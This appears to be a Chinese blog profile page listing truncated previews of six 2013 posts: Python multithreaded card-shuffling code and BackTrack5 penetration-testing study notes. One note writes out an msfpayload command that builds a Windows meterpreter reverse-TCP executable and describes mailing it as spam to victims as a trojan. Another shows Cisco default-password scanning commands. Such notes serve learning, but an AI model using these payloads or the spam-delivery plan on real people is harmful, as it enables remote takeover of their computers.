- 博客(6)
- 资源 (7)
- 收藏
- 关注
原创 python 多线程实现洗牌算法 (二)
#-*- coding:cp936 -*-import randomimport threadingmylock=threading.RLock()ren=[]name=['lidandan','zhangqi','fanfan']pai={1:'黑桃3',2:'红杏3',3:'梅花3',4:'方块3',5:'黑桃4',6:'红杏4',7:'梅花4' ,8:'方
2013-07-23 15:11:41 2083
原创 python 多线程实现洗牌算法(一)
第一次写洗牌代码,代码很多复用了#-*- coding:cp936 -*-import random,timeimport threadingmylock=threading.RLock()huase=['黑桃','红杏','梅花','方块']species=['3','4','5','6','7','8','9','10','J','Q','K','A','2']li
2013-07-23 15:10:14 1067
原创 BackTrack5 学习笔记四
proxy代理技术查看3proxy配置文件代理主机IP:192.168.8.159 web服务器IP:192.168.8.167root@bt:~# vi /pentest/backdoors/3proxy/cfg/3proxy.cfgExternal(在局域网内外部接口这里用不到),internal(改成web服务器的IP,前提是你要在web服务器主机上(不是自己)配置好自
2013-07-18 17:45:39 1763
原创 BackTrack5 学习笔记三
离线攻击MSF1. 制造离线攻击脚本先创建一个反向连接TCP客户端(相当于木马),然后把这个.exe文件通过垃圾邮件发送给别人。/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.167 LPORT=33333 X > /tmp/newgames
2013-07-17 17:12:11 3542
原创 Back Track5学习笔记二
漏洞发现第一部分Cisco工具1. CAT安全审计工具,扫描Cissco路由器的一般性漏洞./CAT -h 192.168.8.254 -w lists/community -a lists/passwords2. Cisco Passwd Scanner,用于发现拥有默认telnet密码“Cisco”的Cisco设备./ciscos 192.168.8.1 3
2013-07-16 23:38:50 4847
原创 Back Track5 学习笔记一
1.BT5默认用户名:root.密码:toor(公司是yeslabccies)2.进入图形化界面命令:startx3.更改密码:sudo passwd root扫描工具第一部分网络配置:4.网络配置文件有两个:/etc/network/interfaces 和 /etc/resolv.conf前一个存放网卡接口、IP、子网掩码等,后一个主要是存放DNS。5.查看
2013-07-16 23:37:48 3904
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人